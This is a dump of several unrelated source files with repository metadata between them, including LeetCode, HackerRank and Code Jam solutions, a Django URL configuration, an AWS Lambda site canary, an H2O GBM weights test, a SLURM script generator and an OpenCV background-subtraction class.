            # when the function is not found there.
            if function_is_present(function, argument):
                return True
        elif argument == function:
            return True
    return False
def make_c_expr(scheme_expr):
    """Render a scheme-style list as a C-style function-call string.

    NOTE: mutates `scheme_expr` in place — the head is popped, and once a
    float literal has been seen, later int literals are promoted to floats.
    """
    # if not isinstance(scheme_expr[0], str):
    #     return scheme_expr # for lists
    pieces = []
    call_name = scheme_expr.pop(0)
    promote_ints = False
    last = len(scheme_expr) - 1
    for position, argument in enumerate(scheme_expr):
        if isinstance(argument, list):
            pieces.append(make_c_expr(argument))
        else:
            if isinstance(argument, int) and promote_ints:
                scheme_expr[position] = float(argument)
            elif isinstance(argument, float):
                # A float argument switches later ints to float form.
                promote_ints = True
            pieces.append(str(scheme_expr[position]))
        if position != last:
            pieces.append(", ")
    return call_name + "(" + "".join(pieces) + ")"
def make_float_funcs(scheme_expr):
    """Return True if the expression (or any sub-expression) needs the
    floating-point operator variants: a float operand under an arithmetic
    operator, or any use of division.

    BUG FIX: the original returned `make_float_funcs(argument)` directly on
    the first nested list, so a False result from that sub-expression
    skipped all remaining siblings (e.g. ['+', ['*', 1, 2], 3.0] wrongly
    came back False). Now the scan continues across all arguments.
    """
    operator = scheme_expr[0]
    for argument in scheme_expr:
        if (isinstance(argument, float) and operator in common_ends) or operator == "/":
            return True
        if isinstance(argument, list) and make_float_funcs(argument):
            return True
    return False
# applies only to built-in math functions that need va_args
# applies only to built-in math functions that need va_args
def make_ints_to_doubles(scheme_expr):
    """Promote int literals to floats in place, recursively.

    Position 1 is deliberately left untouched (matches the original code).
    Returns the same (mutated) list for convenience.
    """
    for position, element in enumerate(scheme_expr):
        if position == 1:
            continue
        if isinstance(element, list):
            scheme_expr[position] = make_ints_to_doubles(element)
        elif isinstance(element, int):
            scheme_expr[position] = float(element)  # still floating-point
    return scheme_expr
def modify_operators(scheme_expr, make_float_operators):
    """Rewrite arithmetic operator heads into C function names, in place.

    Division (or `make_float_operators`) additionally promotes int operands
    to floats and appends the "_d" (double) suffix to the function name.
    """
    for position, element in enumerate(scheme_expr):
        if isinstance(element, list):
            scheme_expr[position] = modify_operators(element, make_float_operators)
        elif position == 0 and element in common_ends:
            # Replace the operator symbol with its named C counterpart.
            scheme_expr[0] = common_ends[element]
            if make_float_operators or element == "/":
                make_ints_to_doubles(scheme_expr)
                scheme_expr[0] += "_d"
    return scheme_expr
if __name__ == "__main__":
    # Ad-hoc manual driver; earlier experiments left commented out.
    # scheme_expr = ['define', 'f', ['lambda', ['x', 'y'], ['+', 'x', 'y', 1]]]
    # scheme_expr = ['define', 'x', 5]
    # scheme_expr = ['func', 5, ['*', 25, 14, ['/', 382, 90]]]
    scheme_expr = ['define', 'x', 5]
    # Rewrite operators in place, then render the tree as a C call string.
    scheme_expr = modify_operators(scheme_expr, make_float_funcs(scheme_expr))
    c_expr = make_c_expr(scheme_expr)
    print(c_expr)
|
[
"you@example.com"
] |
you@example.com
|
e07dde273c02119900fb16720a9652c7291bb2e1
|
b722b5a07cf9596b251e0148dd4e2358e1174071
|
/Intro to CS with Python/src/homework/listing1710.py
|
6628163a46b23740dca568e28043d497846523d9
|
[] |
no_license
|
p3ngwen/open-notes
|
7c894176ece3a1b8c2b1e2b336cdb3099d5d0f67
|
33679b64f5e77289798687337ef7db5503651c21
|
refs/heads/master
| 2023-07-08T02:43:59.431794
| 2021-08-10T16:34:56
| 2021-08-10T16:34:56
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 212
|
py
|
import errno

# Listing 17.10: catching a specific IOError and distinguishing
# "file not found" from other I/O failures via the errno code.
try:
    fp = open( "NotAFile" )  # intentionally missing file
    fp.close()
except IOError as ex:
    # ex.args is (errno, strerror); compare against the symbolic constant.
    if ex.args[0] == errno.ENOENT:
        print( "File not found!" )
    else:
        print( ex.args[0], ex.args[1] )
|
[
"6869736572@f-m.fm"
] |
6869736572@f-m.fm
|
5a931a1392b981326d9106633ad96940ac2d9671
|
8d5337e7132ae3980bda3bc0ed811207ca79b5b7
|
/search/icecreamParlour.py
|
a61e3f9004182b4836c1f518cb20e678620a38f0
|
[] |
no_license
|
thesharpshooter/hackerrank
|
16e7c565053a4d36f0a293c0f8af631cee591424
|
2cfec286e71465edd6603f6bcee608c764a086ec
|
refs/heads/master
| 2021-07-11T09:21:57.838631
| 2017-10-06T05:22:31
| 2017-10-06T05:22:31
| 104,779,843
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 775
|
py
|
# Enter your code here. Read input from STDIN. Print output to STDOUT
def get(arr, m, n):
    """Find two distinct flavour indices whose combined price best fits m.

    Prices are paired with their original positions and sorted; for each
    lower-priced candidate the remaining budget is scanned until exceeded.
    Returns [index_of_dearer, index_of_cheaper] of the closest (ideally
    exact) pair, or [None, None] when no affordable pair exists.
    """
    indexed = sorted(([arr[k], k] for k in range(n)), key=lambda pair: pair[0])
    best = [None, None]
    best_gap = float("inf")
    for a in range(n - 1):
        if indexed[a][0] >= m:
            break  # sorted: nothing cheaper than the budget remains
        remaining = m - indexed[a][0]
        for b in range(a + 1, n):
            gap = remaining - indexed[b][0]
            if gap < 0:
                break  # sorted: every later price also exceeds the budget
            if gap < best_gap:
                best_gap = gap
                best[0] = indexed[b][1]
                best[1] = indexed[a][1]
                if best_gap == 0:
                    break
    return best
# Python 2 driver: t test cases; each gives budget m, flavour count n,
# then the n prices on one line.
t = int(raw_input())
for i in range(t):
    m = int(raw_input())
    n = int(raw_input())
    arr = map(int,raw_input().split())
    res = get(arr,m,n)
    # Print 1-based flavour indices, smaller first.
    print min(res)+1,max(res)+1
|
[
"prakash9266@gmail.com"
] |
prakash9266@gmail.com
|
5f86e01d9b34bd9ecb0e5f8495151675c3e1367b
|
10bf47e8efe8a6e2eb2e237c5634471ba461483b
|
/voting/urls.py
|
8a998b355a2327ae6453160d9b047e40717c72e5
|
[] |
no_license
|
swciitg/IITG_General_Elections
|
d9d4001fa8b65feabc79284ae1df7d078e089712
|
e35e29a1f91e07f3499a5613c091db28b2a07656
|
refs/heads/master
| 2020-05-06T15:31:00.797537
| 2019-04-08T08:02:41
| 2019-04-08T08:02:41
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 987
|
py
|
"""voting URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/2.0/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.conf.urls import include, url
from . import views
# Root URL routing: delegate to each app's own urls module.
urlpatterns = [
    # url(r'^$',views.siteindex,name="siteindex"),
    url('general_elections/', include('general_elections.urls')),
    url(r'^authentication/', include('authentication.urls', namespace='authentication')),
    url('admin/', admin.site.urls),
]
|
[
"beingtmk@gmail.com"
] |
beingtmk@gmail.com
|
d9f83c10fa19003084ba46e89c00610f56fc49a9
|
9b4fe9c2693abc6ecc614088665cbf855971deaf
|
/881.boats-to-save-people.py
|
b1ee51a5ebe9936be3be41a07b61386d05ccc993
|
[
"MIT"
] |
permissive
|
windard/leeeeee
|
e795be2b9dcabfc9f32fe25794878e591a6fb2c8
|
0dd67edca4e0b0323cb5a7239f02ea46383cd15a
|
refs/heads/master
| 2022-08-12T19:51:26.748317
| 2022-08-07T16:01:30
| 2022-08-07T16:01:30
| 222,122,359
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,834
|
py
|
#
# @lc app=leetcode id=881 lang=python
#
# [881] Boats to Save People
#
# https://leetcode.com/problems/boats-to-save-people/description/
#
# algorithms
# Medium (42.90%)
# Total Accepted: 12.4K
# Total Submissions: 28.9K
# Testcase Example: '[1,2]\n3'
#
# The i-th person has weight people[i], and each boat can carry a maximum
# weight of limit.
#
# Each boat carries at most 2 people at the same time, provided the sum of the
# weight of those people is at most limit.
#
# Return the minimum number of boats to carry every given person. (It is
# guaranteed each person can be carried by a boat.)
#
#
#
#
# Example 1:
#
#
# Input: people = [1,2], limit = 3
# Output: 1
# Explanation: 1 boat (1, 2)
#
#
#
# Example 2:
#
#
# Input: people = [3,2,2,1], limit = 3
# Output: 3
# Explanation: 3 boats (1, 2), (2) and (3)
#
#
#
# Example 3:
#
#
# Input: people = [3,5,3,4], limit = 5
# Output: 4
# Explanation: 4 boats (3), (3), (4), (5)
#
# Note:
#
#
# 1 <= people.length <= 50000
# 1 <= people[i] <= limit <= 30000
#
#
#
#
#
#
class Solution(object):
    def numRescueBoats(self, people, limit):
        """Return the minimum number of boats (capacity 2 people, total
        weight <= limit) needed to carry everyone.

        :type people: List[int]
        :type limit: int
        :rtype: int

        Standard greedy two-pointer proof: the heaviest remaining person
        must board some boat now; pairing them with the lightest remaining
        person (when the sum fits) is never worse.

        BUG FIX: the original had an `elif people[first] > limit` branch that
        added `last - first` boats without advancing either pointer — an
        infinite loop if ever reached — and miscounted. Removed; the problem
        guarantees every person fits a boat alone.

        Note: sorts `people` in place, as the original did.
        """
        people.sort()
        light = 0
        heavy = len(people) - 1
        boats = 0
        while light <= heavy:
            # The heaviest person departs on this boat; take the lightest
            # along too when the combined weight fits.
            if people[light] + people[heavy] <= limit:
                light += 1
            heavy -= 1
            boats += 1
        return boats
|
[
"windard@qq.com"
] |
windard@qq.com
|
84d04e0a67a92315abff10fcedcff85bbe31b3a0
|
9a819fc91e17ef9a44e45cf68e76cf696381d06d
|
/Lambda/canary.py
|
03732e914a31ca284fdfaa6e38ee4352ac56a773
|
[] |
no_license
|
Gautam3994/Dark-Knight
|
aef1d6383e0785130db75e80ed40f544a120579e
|
327b2d58851a42da1b707addea73e40fac6a61cc
|
refs/heads/master
| 2022-12-01T11:58:39.857379
| 2020-09-05T18:07:51
| 2020-09-05T18:07:55
| 203,866,327
| 0
| 1
| null | 2022-11-24T09:16:18
| 2019-08-22T20:14:43
|
Python
|
UTF-8
|
Python
| false
| false
| 598
|
py
|
import requests
import os
import datetime
# Canary configuration from Lambda environment variables.
SITE = os.environ['site']          # URL to check
EXPECTED = os.environ['expected']  # substring that must appear in the body
def validate(res):
    """Return True if the expected marker string occurs in the response body."""
    return EXPECTED in res
def lambda_handler(event, context):
    """Canary entry point: fetch SITE and verify EXPECTED appears in the body.

    Raises on validation failure so the Lambda invocation is recorded as an
    error (the point of a canary); prints a completion timestamp either way.
    """
    print(f"Test the site {SITE} at the time {event['time']}")
    # BUG FIX: the original fetched a hard-coded https://www.amazon.in,
    # ignoring the SITE environment variable it claimed to test.
    response = requests.get(url=SITE, headers={'User-Agent': 'AWS Lambda'})
    try:
        if not validate(response.text):
            raise Exception("Validation failed")
    except Exception:  # narrowed from a bare `except:` (which also caught SystemExit)
        print("Check failed")
        # Re-raise so the failure is visible to CloudWatch/alarms instead of
        # being silently swallowed as it was before.
        raise
    else:
        print("okay")
    finally:
        print(f"Check complete at {str(datetime.datetime.now())}")
|
[
"gautam3994@gmail.com"
] |
gautam3994@gmail.com
|
3159b23be1a8a592afc5451129094bdd839623f7
|
34f6120035bfea1f675eb5dd98d59e81209d5c5e
|
/h2o-py/tests/testdir_algos/gbm/pyunit_weights_var_impGBM.py
|
7ea27aa39c4127b00f5a8f9a0451c30aaf0009ea
|
[
"Apache-2.0"
] |
permissive
|
Pure-Mind/h2o-3
|
f5b5b0bf3d2856fee0719adf2754c1af719e5950
|
508ad0e28f40f537e906a372a2760ca6730ebe94
|
refs/heads/master
| 2021-01-17T22:56:02.372211
| 2015-08-09T02:52:34
| 2015-08-09T03:31:04
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,163
|
py
|
import sys
sys.path.insert(1, "../../../")
import h2o
import random
def weights_var_imp(ip,port):
# Connect to h2o
h2o.init(ip,port)
def check_same(data1, data2, min_rows_scale):
gbm1_regression = h2o.gbm(x=data1[["displacement", "power", "weight", "acceleration", "year"]],
y=data1["economy"],
min_rows=5,
ntrees=5,
max_depth=2)
gbm2_regression = h2o.gbm(x=data2[["displacement", "power", "weight", "acceleration", "year"]],
y=data2["economy"],
training_frame=data2,
min_rows=5*min_rows_scale,
weights_column="weights",
ntrees=5,
max_depth=2)
gbm1_binomial = h2o.gbm(x=data1[["displacement", "power", "weight", "acceleration", "year"]],
y=data1["economy_20mpg"],
min_rows=5,
distribution="bernoulli",
ntrees=5,
max_depth=2)
gbm2_binomial = h2o.gbm(x=data2[["displacement", "power", "weight", "acceleration", "year"]],
y=data2["economy_20mpg"],
training_frame=data2,
weights_column="weights",
min_rows=5*min_rows_scale,
distribution="bernoulli",
ntrees=5,
max_depth=2)
gbm1_multinomial = h2o.gbm(x=data1[["displacement", "power", "weight", "acceleration", "year"]],
y=data1["cylinders"],
min_rows=5,
distribution="multinomial",
ntrees=5,
max_depth=2)
gbm2_multinomial = h2o.gbm(x=data2[["displacement", "power", "weight", "acceleration", "year"]],
y=data2["cylinders"],
training_frame=data2,
weights_column="weights",
min_rows=5*min_rows_scale,
distribution="multinomial",
ntrees=5,
max_depth=2)
reg1_vi = gbm1_regression.varimp(return_list=True)
reg2_vi = gbm2_regression.varimp(return_list=True)
bin1_vi = gbm1_binomial.varimp(return_list=True)
bin2_vi = gbm2_binomial.varimp(return_list=True)
mul1_vi = gbm1_multinomial.varimp(return_list=True)
mul2_vi = gbm2_multinomial.varimp(return_list=True)
print "Varimp (regresson) no weights vs. weights: {0}, {1}".format(reg1_vi, reg2_vi)
print "Varimp (binomial) no weights vs. weights: {0}, {1}".format(bin1_vi, bin2_vi)
print "Varimp (multinomial) no weights vs. weights: {0}, {1}".format(mul1_vi, mul2_vi)
for rvi1, rvi2 in zip(reg1_vi, reg2_vi): assert rvi1 == rvi1, "Expected vi's (regression) to be the same, but got {0}, and {1}".format(rvi1, rvi2)
for bvi1, bvi2 in zip(bin1_vi, bin2_vi): assert bvi1 == bvi1, "Expected vi's (binomial) to be the same, but got {0}, and {1}".format(bvi1, bvi2)
for mvi1, mvi2 in zip(mul1_vi, mul2_vi): assert mvi1 == mvi1, "Expected vi's (multinomial) to be the same, but got {0}, and {1}".format(mvi1, mvi2)
h2o_cars_data = h2o.import_frame(h2o.locate("smalldata/junit/cars_20mpg.csv"))
h2o_cars_data["economy_20mpg"] = h2o_cars_data["economy_20mpg"].asfactor()
h2o_cars_data["cylinders"] = h2o_cars_data["cylinders"].asfactor()
# uniform weights same as no weights
weight = random.randint(1,10)
uniform_weights = [[weight] for r in range(406)]
h2o_uniform_weights = h2o.H2OFrame(python_obj=uniform_weights)
h2o_uniform_weights.setNames(["weights"])
h2o_data_uniform_weights = h2o_cars_data.cbind(h2o_uniform_weights)
print "\n\nChecking that using uniform weights is equivalent to no weights:"
check_same(h2o_cars_data, h2o_data_uniform_weights, weight)
# zero weights same as removed observations
zero_weights = [[0] if random.randint(0,1) else [1] for r in range(406)]
h2o_zero_weights = h2o.H2OFrame(python_obj=zero_weights)
h2o_zero_weights.setNames(["weights"])
h2o_data_zero_weights = h2o_cars_data.cbind(h2o_zero_weights)
h2o_data_zeros_removed = h2o_cars_data[h2o_zero_weights["weights"] == 1]
print "\n\nChecking that using some zero weights is equivalent to removing those observations:"
check_same(h2o_data_zeros_removed, h2o_data_zero_weights, 1)
# doubled weights same as doubled observations
doubled_weights = [[1] if random.randint(0,1) else [2] for r in range(406)]
h2o_doubled_weights = h2o.H2OFrame(python_obj=doubled_weights)
h2o_doubled_weights.setNames(["weights"])
h2o_data_doubled_weights = h2o_cars_data.cbind(h2o_doubled_weights)
doubled_data = h2o.as_list(h2o_cars_data, use_pandas=False)
colnames = doubled_data.pop(0)
for idx, w in enumerate(doubled_weights):
if w[0] == 2: doubled_data.append(doubled_data[idx])
h2o_data_doubled = h2o.H2OFrame(python_obj=doubled_data)
h2o_data_doubled.setNames(colnames)
h2o_data_doubled["economy_20mpg"] = h2o_data_doubled["economy_20mpg"].asfactor()
h2o_data_doubled["cylinders"] = h2o_data_doubled["cylinders"].asfactor()
h2o_data_doubled_weights["economy_20mpg"] = h2o_data_doubled_weights["economy_20mpg"].asfactor()
h2o_data_doubled_weights["cylinders"] = h2o_data_doubled_weights["cylinders"].asfactor()
print "\n\nChecking that doubling some weights is equivalent to doubling those observations:"
check_same(h2o_data_doubled, h2o_data_doubled_weights, 1)
if __name__ == "__main__":
h2o.run_test(sys.argv, weights_var_imp)
|
[
"eric.eckstrand@gmail.com"
] |
eric.eckstrand@gmail.com
|
5a792baad7875ecfd9cb09eb33eff687dbab1295
|
1699300e1225f0994fbfd5e13a7eb4436a5df14d
|
/03_SC_Track/02_Original_V_624_Joho/Make_SLURM_submission_script.py
|
6ff6b2d5f59e75247f2e258efde560ac32922702
|
[
"MIT"
] |
permissive
|
HaroonRafique/PyORBIT_MD4224
|
26307a60ed79f3e170fbd655eb8cbe8cc9a0dfa9
|
6f68a80b2f8bf1cbeb9e2fc840925efe8a8b5672
|
refs/heads/master
| 2023-04-25T13:27:49.756836
| 2020-08-25T10:26:07
| 2020-08-25T10:26:07
| 215,249,664
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,313
|
py
|
#!/usr/bin/env python
# Python script to create a SLURM submission script for PyORBIT
# 21 March 2019 Haroon Rafique CERN BE-ABP-HSI
import os
#-----------------------------------------------------------------------
# SETTINGS
#-----------------------------------------------------------------------
script_name = "SLURM_submission_script.sh"
# Switches
hyperthreading = False # Enable hyperthreading
exclusive = True # Exclusive (see SLURM documentation)
autotime = True # 2 days for short queues, 2 weeks for long queues
autotask = True # Automatically set nodes to maximum tasks
clean_all = True # Clean simulation folder before running (False when resuming pickle checkpoint)
# Must be chosen
# ~ queue = 'inf-long', 'inf-short', 'batch-long', 'batch-short'
queue = 'batch-short'
n_nodes = 2
jobname = '03_02'
path_to_simulation = os.path.dirname(os.path.realpath(__file__)) # This directory
# Optional - have to use with correct switches
manual_time = '504:00:00' # manually set using format 'hours:minutes:seconds'
manual_tasks = 40 # manually change ntasks
# Defaults - can be changed
output_file_name = 'slurm.%N.%j.out'
error_file_name = 'slurm.%N.%j.err'
root_dir = '/hpcscratch/user/harafiqu'
simulation_file = 'pyOrbit.py'
#-----------------------------------------------------------------------
# AUTOMATICALLY FORMAT SCRIPT
#-----------------------------------------------------------------------
# Tasks per node: presumably 16 (batch) / 20 (inf) physical cores, doubled
# when hyperthreading is enabled — confirm against the cluster specs.
n_tasks = 0
if autotask:
    if hyperthreading:
        if 'batch' in queue: n_tasks = 32
        elif 'inf' in queue: n_tasks = 40
        else:
            print 'queue not recognised'
            exit(0)
    else:
        if 'batch' in queue: n_tasks = 16
        elif 'inf' in queue: n_tasks = 20
        else:
            print 'queue not recognised'
            exit(0)
else: n_tasks = manual_tasks
time = '48:00:00'
if autotime:
if queue == 'batch-short': time = '48:00:00'
elif queue == 'inf-short': time = '120:00:00'
elif queue == 'inf-long' or 'batch-long': time = '504:00:00'
else:
print 'queue not recognised'
exit(0)
else: time = manual_time
#-----------------------------------------------------------------------
# WRITE FILE
#-----------------------------------------------------------------------
if os.path.exists(script_name):
print 'SLURM submission script ' + script_name + ' already exists. Deleting'
os.remove(script_name)
print "Creating ", script_name
f= open(script_name,"w")
f.write('#!/bin/bash')
f.write('\n#SBATCH --job-name=' + str(jobname))
f.write('\n#SBATCH --output=' + str(output_file_name))
f.write('\n#SBATCH --error=' + str(error_file_name))
f.write('\n#SBATCH --nodes=' + str(n_nodes))
f.write('\n#SBATCH --ntasks-per-node=' + str(n_tasks))
f.write('\n#SBATCH --partition=' + str(queue))
f.write('\n#SBATCH --time=' + str(time))
f.write('\n#SBATCH --mem-per-cpu=3200M')
if (exclusive): f.write('\n#SBATCH --exclusive')
if not hyperthreading: f.write('\n#SBATCH --hint=nomultithread')
f.write('\n')
f.write('\nBATCH_ROOT_DIR=' + str(root_dir))
f.write('\nRUN_DIR=' + str(path_to_simulation))
f.write('\nOrigIwd=$(pwd)')
f.write('\n')
f.write('\n# Make an output folder in the root directory to hold SLURM info file')
f.write('\ncd ${BATCH_ROOT_DIR}')
f.write('\noutput_dir="output"')
f.write('\nmkdir -p $output_dir')
f.write('\n')
f.write('\n# Fill the SLURM info file')
f.write('\nsimulation_info_file="${BATCH_ROOT_DIR}/${output_dir}/simulation_info_${SLURM_JOB_ID}.${SLURM_NODEID}.${SLURM_PROCID}.txt"')
f.write('\necho "PyOrbit path: `readlink -f ${ORBIT_ROOT}`" >> ${simulation_info_file}')
f.write('\necho "Run path: `readlink -f ${RUN_DIR}`" >> ${simulation_info_file}')
f.write('\necho "Submit host: `readlink -f ${SLURM_SUBMIT_HOST}`" >> ${simulation_info_file}')
f.write('\necho "SLURM Job name: `readlink -f ${SLURM_JOB_NAME}`" >> ${simulation_info_file}')
f.write('\necho "SLURM Job ID: `readlink -f ${SLURM_JOB_ID}`" >> ${simulation_info_file}')
f.write('\necho "SLURM Nodes allocated: `readlink -f ${SLURM_JOB_NUM_NODES}`" >> ${simulation_info_file}')
f.write('\necho "SLURM CPUS per Node: `readlink -f ${SLURM_CPUS_ON_NODE}`" >> ${simulation_info_file}')
f.write('\necho "SLURM Node ID: `readlink -f ${SLURM_NODEID}`" >> ${simulation_info_file}')
f.write('\necho "SLURM total cores for job: `readlink -f ${SLURM_NTASKS}`" >> ${simulation_info_file}')
f.write('\necho "SLURM process ID: `readlink -f ${SLURM_PROCID}`" >> ${simulation_info_file}')
f.write('\necho "****************************************" >> ${simulation_info_file}')
f.write('\n')
f.write('\n# Enter job directory, clean it, and setup environment -> SLURM info file')
f.write('\ncd ${RUN_DIR}')
if clean_all:f.write('\n./clean_all.sh')
f.write('\n. setup_environment.sh >> ${simulation_info_file}')
f.write('\n')
f.write('\n# Load correct MPI')
f.write('\nmodule load mpi/mvapich2/2.3')
f.write('\n')
f.write('\ntstart=$(date +%s)')
f.write('\n')
f.write('\n# Run the job')
if hyperthreading:f.write('\nsrun ${ORBIT_ROOT}/bin/pyORBIT ${RUN_DIR}/' + str(simulation_file))
else:f.write('\nsrun --hint=nomultithread ${ORBIT_ROOT}/bin/pyORBIT ${RUN_DIR}/' + str(simulation_file))
f.write('\n')
f.write('\ntend=$(date +%s)')
f.write('\ndt=$(($tend - $tstart))')
f.write('\necho "total simulation time (s): " $dt >> ${simulation_info_file}')
f.close()
print 'SLURM submission script creation finished'
|
[
"haroon.rafique@protonmail.com"
] |
haroon.rafique@protonmail.com
|
1beabcb56dd1176bcf5845a34ee13550fc79898d
|
6a612dba404176b7e180dfb2791353701c82a3bf
|
/processors/backsubtractors.py
|
bce6b46663e1146affff7a04f9cff7a61ad6f29c
|
[] |
no_license
|
tulare/smile-in-the-light
|
d15a3e142974a055215b3eb9ac8dd1e5e57fdb1e
|
1250579f015fa4cb8c4593976e27579e5ed5515d
|
refs/heads/master
| 2020-05-27T07:57:29.617680
| 2019-06-26T10:31:39
| 2019-06-26T10:31:39
| 188,537,874
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 943
|
py
|
# -*- encoding: utf8 -*-
import cv2 as cv
import numpy as np
from .core import FrameProcessor

# BUG FIX: __all__ previously exported 'BackgroundSubtractor', a name that is
# never defined in this module, so `from backsubtractors import *` raised
# AttributeError.  Export the class that actually exists here.
__all__ = ['BackSubProcessor']

# ------------------------------------------------------------------------------
# OpenCV background-subtraction algorithm factories, keyed by short name.
OPENCV_BACKSUB_ALGOS = {
    'MOG2': cv.createBackgroundSubtractorMOG2,
    'KNN': cv.createBackgroundSubtractorKNN,
}

# ------------------------------------------------------------------------------
class BackSubProcessor(FrameProcessor):
    """Frame processor that masks out the static background of each frame."""

    def params(self, **kwargs):
        """Configure the subtractor.

        ``algo`` selects the OpenCV algorithm: 'MOG2' (default) or 'KNN'.
        An unrecognized name silently falls back to KNN (original behavior).
        """
        algo = kwargs.get('algo', 'MOG2')
        try:
            self.backsub = OPENCV_BACKSUB_ALGOS[algo]()
        except KeyError:
            self.backsub = OPENCV_BACKSUB_ALGOS['KNN']()

    def apply(self, frame, context):
        """Return ``frame`` with non-foreground pixels zeroed out."""
        fgmask = self.backsub.apply(frame)
        frame = cv.bitwise_and(frame, frame, mask=fgmask)
        return frame
|
[
"tulare.paxgalactica@gmail.com"
] |
tulare.paxgalactica@gmail.com
|
8c4480388e7fa8726898f73420d2f3df40bbf8a5
|
d5f2723c879e28d1bfded4bea3c4d327a6d8c4e5
|
/03_Visualizing_Data/3_histogram.py
|
4ce05d1953f447a9609544f396aa265152f8f6a8
|
[
"Unlicense"
] |
permissive
|
ramalho/data-science-from-scratch
|
709adb2bbef280c10edad4bdc2eb3d2a997d5e79
|
46ead47912c4a0a945decdded1999a8a4cd67b57
|
refs/heads/master
| 2020-12-30T23:46:40.147841
| 2017-01-28T01:01:54
| 2017-01-28T01:01:54
| 80,624,463
| 2
| 0
| null | 2017-02-01T13:52:20
| 2017-02-01T13:52:20
| null |
UTF-8
|
Python
| false
| false
| 964
|
py
|
#!/usr/bin/env python3
"""Figure 3-3. Using a bar chart for a histogram"""
import matplotlib.pyplot as plt
from collections import Counter


def make_chart_histogram():
    """Plot the distribution of exam grades bucketed into deciles."""
    grades = [83, 95, 91, 87, 70, 0, 85, 82, 100, 67, 73, 77, 0]

    # PEP 8 (E731): use a def instead of assigning a lambda to a name.
    def decile(grade):
        # Bucket a grade into its decile: 87 -> 80, 100 -> 100.
        return grade // 10 * 10

    histogram = Counter(decile(grade) for grade in grades)

    plt.bar([x - 4 for x in histogram.keys()],  # shift each bar to the left by 4
            histogram.values(),                 # give each bar its correct height
            8)                                  # give each bar a width of 8
    plt.axis([-5, 105, 0, 5])                   # x-axis from -5 to 105,
                                                # y-axis from 0 to 5
    plt.xticks([10 * i for i in range(11)])     # x-axis labels at 0, 10, ..., 100
    plt.xlabel("Decile")
    plt.ylabel("# of Students")
    plt.title("Distribution of Exam 1 Grades")
    plt.show()


if __name__ == "__main__":
    make_chart_histogram()
|
[
"luciano@ramalho.org"
] |
luciano@ramalho.org
|
9096829dbf0ff0e9494f24cf8e1132798e9fa9fa
|
cf6a50732d708a3a3db0f297b73cb6f449a00b44
|
/Practice13_LoopingTechniques/Prac_13_13_change_code.py
|
9a157c3b996983c6bd0817e18f131585525f2a57
|
[] |
no_license
|
subash319/PythonDepth
|
9fe3920f4b0a25be02a9abbeeb60976853ab812e
|
0de840b7776009e8e4362d059af14afaac6a8879
|
refs/heads/master
| 2022-11-16T03:03:56.874422
| 2020-07-17T01:19:39
| 2020-07-17T01:19:39
| 266,921,459
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 568
|
py
|
# 13.
#
# data = [2,3,1,4,7,5]
# max_even = 0
# for item in data:
#     if item%2==0 and item>max_even:
#         max_even = item
# print(f'Largest even number is {max_even}')
# In this for loop, we are iterating over the items of a list and finding the largest even number.
#
# Make changes in this code so that you get the largest even number as well as its index.


def largest_even_with_index(values):
    """Return ``(largest_even, index)``, or ``(None, None)`` if no even number.

    BUG FIX: the original only bound ``idx`` inside the loop, so a list with
    no even element left it undefined and the final print raised NameError.
    Starting from None (instead of ``max_even = 0``) also makes negative even
    numbers eligible, which the ``item > 0`` threshold silently excluded.
    """
    best = best_idx = None
    for index, item in enumerate(values):
        if item % 2 == 0 and (best is None or item > best):
            best, best_idx = item, index
    return best, best_idx


data = [2, 3, 1, 4, 7, 5]
max_even, idx = largest_even_with_index(data)
print(f'Largest even number is {max_even} at index {idx}')
|
[
"subas319@gmail.com"
] |
subas319@gmail.com
|
d0093035d3098ebaa03f79ae3da3b4850586ba93
|
487ce91881032c1de16e35ed8bc187d6034205f7
|
/codes/CodeJamCrawler/16_0_1_neat/16_0_1_yordan_main.py
|
f1df87f60260bd9647255e67663f6aa609dbebc2
|
[] |
no_license
|
DaHuO/Supergraph
|
9cd26d8c5a081803015d93cf5f2674009e92ef7e
|
c88059dc66297af577ad2b8afa4e0ac0ad622915
|
refs/heads/master
| 2021-06-14T16:07:52.405091
| 2016-08-21T13:39:13
| 2016-08-21T13:39:13
| 49,829,508
| 2
| 0
| null | 2021-03-19T21:55:46
| 2016-01-17T18:23:00
|
Python
|
UTF-8
|
Python
| false
| false
| 884
|
py
|
#!/usr/bin/env python
"""Code Jam 2016 Qualification A ("Counting Sheep") solver."""
import sys


def digits(x):
    """Return the decimal digits of abs(x), least significant first."""
    x = abs(x)
    d = []
    while x:
        d.append(x % 10)
        x //= 10
    return d or [0]  # 0 still has one digit


def gen(x):
    """Yield the positive multiples of x: x, 2x, 3x, ... (infinite)."""
    i = 1
    while 1:
        yield x * i
        i += 1


def read_input(f):
    """Read the case count N, then N integers (one per line) from f."""
    N = int(f.readline())
    inputs = []
    for line in f:
        inputs.append(int(line))
    assert len(inputs) == N
    return inputs


def solve(x):
    """Return the last multiple of x counted before every digit 0-9 has
    appeared, or 'INSOMNIA' when counting never ends (only for x == 0)."""
    if x == 0:
        return 'INSOMNIA'
    mask = 0x0  # bit d set <=> digit d has been seen
    for y in gen(x):
        for d in digits(y):
            # BUG FIX: decimal digits are 0-9; the guard was `d <= 10`,
            # which could never catch a bad digit.
            assert d <= 9
            mask |= (1 << d)
        if mask == 0b1111111111:  # all ten digits seen
            return y
    return 'Damn...'  # unreachable: gen() is infinite


def main():
    inputs = read_input(sys.stdin)
    for i, x in enumerate(inputs, start=1):
        print('Case #{}: {}'.format(i, solve(x)))


if __name__ == '__main__':
    main()
|
[
"[dhuo@tcd.ie]"
] |
[dhuo@tcd.ie]
|
5d4c4aa85a2d9cdec40ea80181cfef2bfb26c1ec
|
a6e4a6f0a73d24a6ba957277899adbd9b84bd594
|
